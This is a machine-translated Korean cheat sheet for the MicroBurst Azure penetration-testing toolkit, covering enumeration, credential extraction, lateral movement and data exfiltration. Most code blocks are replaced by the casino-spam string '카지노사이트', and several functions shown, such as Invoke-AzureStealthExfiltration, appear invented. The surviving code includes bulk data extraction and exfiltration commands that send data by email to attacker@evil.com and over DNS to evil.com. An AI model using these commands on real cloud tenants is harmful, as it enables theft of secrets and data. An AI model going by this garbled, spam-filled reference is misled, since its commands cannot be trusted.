MicroBurst Azure 보안 테스트 툴킷 열 시트
제품정보
MicroBurst는 Microsoft Azure 보안을 평가하기위한 NetSPI에 의해 개발 된 PowerShell 스크립트 모음입니다. Azure 서비스 발견, 특권 에스컬레이션, 측면 운동 및 데이터 여과에 대한 도구가 포함되어 있습니다. Azure 침투 테스트를 위한 종합 툴킷.
· ** 보증**: 이 도구는 공인된 침투 테스트 및 보안 평가에만 적용됩니다. 모든 환경에서 사용하기 전에 적절한 권한이 있습니다.
설치하기
PowerShell 갤러리 설치
카지노사이트
수동 설치
카지노사이트
Git 설치
카지노사이트
기본 사용
모듈 설정
카지노사이트
인증현황
카지노사이트
명령 참조
Reconnaissance 기능
| | Function | Description | |
| --- | --- |
| | Invoke-EnumerateAzureBlobs
| Enumerate Azure storage blobs | |
| | Invoke-EnumerateAzureSubDomains
| Enumerate Azure subdomains | |
| | Get-AzurePasswords
| Extract passwords from Azure resources | |
| | Get-AzureDomainInfo
| Get domain information | |
| | Invoke-AzureRmVmBulkCMD
| Execute commands on multiple VMs | |
저장 계정 기능
| | Function | Description | |
| --- | --- |
| | Invoke-EnumerateAzureBlobs
| Find accessible storage blobs | |
| | Get-AzureBlobFiles
| Download files from storage | |
| | Invoke-AzureStorageAccountEnum
| Enumerate storage accounts | |
| | Get-AzureStorageAccountKeys
| Extract storage account keys | |
가상 머신 기능
| | Function | Description | |
| --- | --- |
| | Invoke-AzureRmVmBulkCMD
| Bulk command execution | |
| | Get-AzureVMDisk
| Access VM disk information | |
| | Invoke-AzureVMUserDataEnum
| Enumerate VM user data | |
| | Get-AzureVMExtensionSettings
| Get VM extension settings | |
Azure 스토리지
Blob 스토리지 디스커버리
카지노사이트
저장 계정 Enumeration
카지노사이트
파일 공유 Enumeration
카지노사이트
Subdomain 및 서비스 디스커버리
Azure Subdomain 사용
카지노사이트
서비스 Discovery
카지노사이트
DNS 환경
ο 회원 관리
가상 머신 폭발
VM 명령 실행
카지노사이트
VM 디스크 액세스
카지노사이트
VM 연장 폭발
카지노사이트
Credential 및 비밀 추출
비밀번호 추출
카지노사이트
인증서 추출
카지노사이트
제품 설명 데이터 추출
카지노사이트
데이터베이스 Exploitation
SQL 데이터베이스
카지노사이트
SQL 데이터베이스 액세스
카지노사이트
CosmosDB 폭발
오프화이트
웹 신청 Exploitation
웹 앱 축소
카지노사이트
웹 앱 평가
오프화이트
기능 앱 평가
카지노사이트
Privilege 확장
역할 할당
카지노사이트
서비스 Principal 뚱 베어
카지노사이트
관리 Identity 폭발
카지노사이트
옆 운동
크로스 구독 오시는 길
카지노사이트
Cross-Tenant 액세스
카지노사이트
리소스 그룹 Pivoting
```powershell
Enumerate resource groups
Get-AzureResourceGroups -SubscriptionId "subscription-id"
Find resources with weak permissions
Find-AzureWeakPermissions -ResourceGroupName "rg-name"
Pivot through resource groups
Invoke-AzureResourceGroupPivot -SourceRG "source-rg" -TargetRG "target-rg" ```의 경우
자료 Exfiltration
대량 데이터 추출
```powershell
Extract all accessible data
Invoke-AzureBulkDataExtraction -SubscriptionId "subscription-id" -OutputPath "C:\Exfiltrated\"
Extract specific data types
Invoke-AzureDataExtraction -DataTypes @("Secrets", "Certificates", "Databases") -OutputPath "C:\Exfiltrated\"
Extract with compression
Invoke-AzureDataExtraction -SubscriptionId "subscription-id" -OutputPath "C:\Exfiltrated\" -Compress ```에 대하여
스텔스 Exfiltration
```powershell
Exfiltrate via storage account
Invoke-AzureStealthExfiltration -Method "StorageAccount" -TargetStorage "exfil-storage"
Exfiltrate via email
Invoke-AzureStealthExfiltration -Method "Email" -EmailAddress "attacker@evil.com"
Exfiltrate via DNS
Invoke-AzureStealthExfiltration -Method "DNS" -DNSServer "evil.com" ```의 경우
자동화 및 스크립트
자동화된 평가 스크립트
```powershell
Comprehensive Azure assessment
param( [string]$SubscriptionId, [string]$OutputPath = "C:\AzureAssessment" )
Create output directory
New-Item -ItemType Directory -Path $OutputPath -Force
Authenticate
Connect-AzAccount
Set subscription context
Set-AzContext -SubscriptionId $SubscriptionId
Enumerate subdomains
Write-Host "Enumerating subdomains..." $subdomains = Invoke-EnumerateAzureSubDomains -Base (Get-AzContext).Subscription.Name $subdomains|Out-File "$OutputPath\subdomains.txt"
Enumerate storage blobs
Write-Host "Enumerating storage blobs..." $blobs = Invoke-EnumerateAzureBlobs -Base (Get-AzContext).Subscription.Name $blobs|Out-File "$OutputPath\blobs.txt"
Extract passwords
Write-Host "Extracting passwords..." $passwords = Get-AzurePasswords -SubscriptionId $SubscriptionId $passwords|Export-Csv "$OutputPath\passwords.csv" -NoTypeInformation
Get VM information
Write-Host "Gathering VM information..." $vms = Get-AzVM $vms|Export-Csv "$OutputPath\vms.csv" -NoTypeInformation
Generate summary report
$summary = @\\{ AssessmentDate = Get-Date SubscriptionId = $SubscriptionId SubdomainsFound = $subdomains.Count BlobsFound = $blobs.Count PasswordsFound = $passwords.Count VMsFound = $vms.Count \\}
| $summary | ConvertTo-Json | Out-File "$OutputPath\summary.json" |
Write-Host "Assessment completed. Results saved to $OutputPath" ```에 대하여
연속 모니터링
```powershell
Continuous Azure monitoring
param( [int]$IntervalMinutes = 60, [string]$LogPath = "C:\AzureMonitoring\monitor.log" )
while ($true) \\{ $timestamp = Get-Date Write-Output "[$timestamp] Starting Azure monitoring cycle"|Tee-Object -FilePath $LogPath -Append
try \\\\{
# Check for new storage accounts
$newStorage = Get-AzStorageAccount|Where-Object \\\\{$_.CreationTime -gt (Get-Date).AddMinutes(-$IntervalMinutes)\\\\}
if ($newStorage) \\\\{
Write-Output "[$timestamp] New storage accounts detected: $($newStorage.Count)"|Tee-Object -FilePath $LogPath -Append
\\\\}
# Check for new VMs
$newVMs = Get-AzVM|Where-Object \\\\{$_.TimeCreated -gt (Get-Date).AddMinutes(-$IntervalMinutes)\\\\}
if ($newVMs) \\\\{
Write-Output "[$timestamp] New VMs detected: $($newVMs.Count)"|Tee-Object -FilePath $LogPath -Append
\\\\}
# Check for new role assignments
$newRoles = Get-AzRoleAssignment|Where-Object \\\\{$_.CreatedOn -gt (Get-Date).AddMinutes(-$IntervalMinutes)\\\\}
if ($newRoles) \\\\{
Write-Output "[$timestamp] New role assignments detected: $($newRoles.Count)"|Tee-Object -FilePath $LogPath -Append
\\\\}
\\\\}
catch \\\\{
Write-Output "[$timestamp] Error during monitoring: $($_.Exception.Message)"|Tee-Object -FilePath $LogPath -Append
\\\\}
Start-Sleep -Seconds ($IntervalMinutes * 60)
\\} ```의 경우
문제 해결
인증 문제
카지노사이트
모듈 문제
카지노사이트
제출 문제
카지노사이트
다른 도구와 통합
BloodHound 통합
카지노사이트
Metasploit 통합
카지노사이트
지원하다
이 속임수 시트는 MicroBurst를 사용하여 포괄적 인 참조를 제공합니다. 항상 Azure 보안 평가를 수행하기 전에 적절한 권한이 있습니다. 필수